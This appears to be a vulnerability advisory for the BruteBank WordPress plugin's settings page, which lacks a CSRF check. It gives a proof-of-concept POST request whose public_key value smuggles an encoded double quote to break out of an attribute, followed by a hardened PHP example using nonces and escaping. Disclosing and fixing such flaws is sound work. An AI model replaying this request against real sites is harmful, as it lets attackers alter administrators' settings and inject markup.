The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
POST /wp-admin/admin.php?page=brutebank-settings HTTP/1.1

public_key=site.a%22%2522aaaa%3Daaa&secret_key=aaa&update=Update
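
A settings handler with the missing check in place, as an added example rather than the plugin's own code. The `brutebank_example_*` function, option and nonce names are assumptions; the page slug and the `public_key`, `secret_key` and `update` fields come from the request above.

```php
<?php
// Added example: hypothetical hardened settings page, not the plugin's code.
// Assumed names: every brutebank_example_* function, option key and nonce field.

const BRUTEBANK_EXAMPLE_NONCE_ACTION = 'brutebank_example_save_settings';

add_action( 'admin_menu', function () {
    // Registers /wp-admin/admin.php?page=brutebank-settings for administrators only.
    add_menu_page( 'BruteBank', 'BruteBank', 'manage_options',
        'brutebank-settings', 'brutebank_example_settings_page' );
} );

function brutebank_example_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }

    if ( isset( $_POST['update'] ) ) {
        // Stops with a 403 unless the POST carries a nonce issued to this
        // user and session for this action. A form hosted on another origin
        // cannot read that value, so the request shown above is rejected.
        check_admin_referer( BRUTEBANK_EXAMPLE_NONCE_ACTION, 'brutebank_example_nonce' );

        foreach ( array( 'public_key', 'secret_key' ) as $field ) {
            $value = isset( $_POST[ $field ] )
                ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) )
                : '';
            update_option( 'brutebank_example_' . $field, $value );
        }
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }
    ?>
    <form method="post">
        <?php // Emits the hidden nonce field (and a referer field) the handler verifies. ?>
        <?php wp_nonce_field( BRUTEBANK_EXAMPLE_NONCE_ACTION, 'brutebank_example_nonce' ); ?>
        <?php // esc_attr() keeps a stored double quote from closing the value attribute. ?>
        <input type="text" name="public_key"
               value="<?php echo esc_attr( get_option( 'brutebank_example_public_key', '' ) ); ?>">
        <input type="text" name="secret_key"
               value="<?php echo esc_attr( get_option( 'brutebank_example_secret_key', '' ) ); ?>">
        <input type="submit" name="update" value="Update">
    </form>
    <?php
}
```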